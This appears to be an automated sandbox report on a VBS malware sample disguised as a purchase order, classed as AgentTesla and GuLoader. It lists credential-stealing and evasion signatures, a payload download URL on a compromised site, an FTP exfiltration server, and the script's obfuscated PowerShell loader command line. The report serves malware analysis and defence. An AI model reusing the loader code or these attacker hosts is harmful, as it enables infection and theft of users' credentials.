Windows Analysis Report
PO-09784893 xlsx.vbs

Overview

General Information

Sample Name: PO-09784893 xlsx.vbs
Analysis ID: 755440
MD5: bfa859d9ad7b23d3606ea13f525065a7
SHA1: a1b3e395dc20bcdaa866b953a08a48d0079bace2
SHA256: ec51e9ad23c469e82059bd497873749017e80e136053a25c7a752ffa18bf2002
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png Avira URL Cloud: Label: malware
Source: ftp.mcmprint.net Virustotal: Detection: 9% Perma Link
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: $Pl8C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.pdb source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp
Source: Joe Sandbox View IP Address: 185.31.121.136 185.31.121.136
Source: global traffic HTTP traffic detected: GET /wp-admin/includes/yyXYRRIJkuolPn153.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache
Source: unknown FTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49819 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.mcmprint.netnoffice
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://OowQOv.com
Source: CasPol.exe, 0000000B.00000002.6743714275.000000001C260000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.6719479887.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://b3solutionscws.com/wp-admin/includes/yyXYRRIJkuolPn153.fla
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://hWFpSCunbgPMSZDs.net
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2579563055.0000000004421000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBPl
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2587473723.000000000457C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2622363726.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000005.00000002.2635495743.000000000548A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000000B.00000002.6747286598.000000001D1C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: b3solutionscws.com
Source: global traffic HTTP traffic detected: GET /wp-admin/includes/yyXYRRIJkuolPn153.fla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: b3solutionscws.comCache-Control: no-cache

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku Jump to behavior
Source: Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5576
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5576 Jump to behavior
Source: PO-09784893 xlsx.vbs, type: SAMPLE Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02879188 5_2_02879188
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0287E7C9 5_2_0287E7C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0287E7D8 5_2_0287E7D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_028796B1 5_2_028796B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE05D7 5_2_07BE05D7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE2070 5_2_07BE2070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BE2062 5_2_07BE2062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C2F970 5_2_07C2F970
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C252C0 5_2_07C252C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C252B0 5_2_07C252B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C20040 5_2_07C20040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C20021 5_2_07C20021
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C44EA8 5_2_07C44EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C425A8 5_2_07C425A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C425B8 5_2_07C425B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C6FCA0 5_2_07C6FCA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07C6F090 5_2_07C6F090
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07BED639 5_2_07BED639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_00B1C0AD 11_2_00B1C0AD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1F3AD720 11_2_1F3AD720
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1F3A4FA0 11_2_1F3A4FA0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1F3A7AE0 11_2_1F3A7AE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA719B0 11_2_1FA719B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA879E0 11_2_1FA879E0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA809D2 11_2_1FA809D2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA85128 11_2_1FA85128
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA8C323 11_2_1FA8C323
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA8BB58 11_2_1FA8BB58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA864A0 11_2_1FA864A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA8DA82 11_2_1FA8DA82
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA8DEC8 11_2_1FA8DEC8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1FA84500 11_2_1FA84500
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1CFDAFDA NtQuerySystemInformation, 11_2_1CFDAFDA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 11_2_1CFDAFB8 NtQuerySystemInformation, 11_2_1CFDAFB8
Source: PO-09784893 xlsx.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u5h0ocqr\u5h0ocqr.cmdline
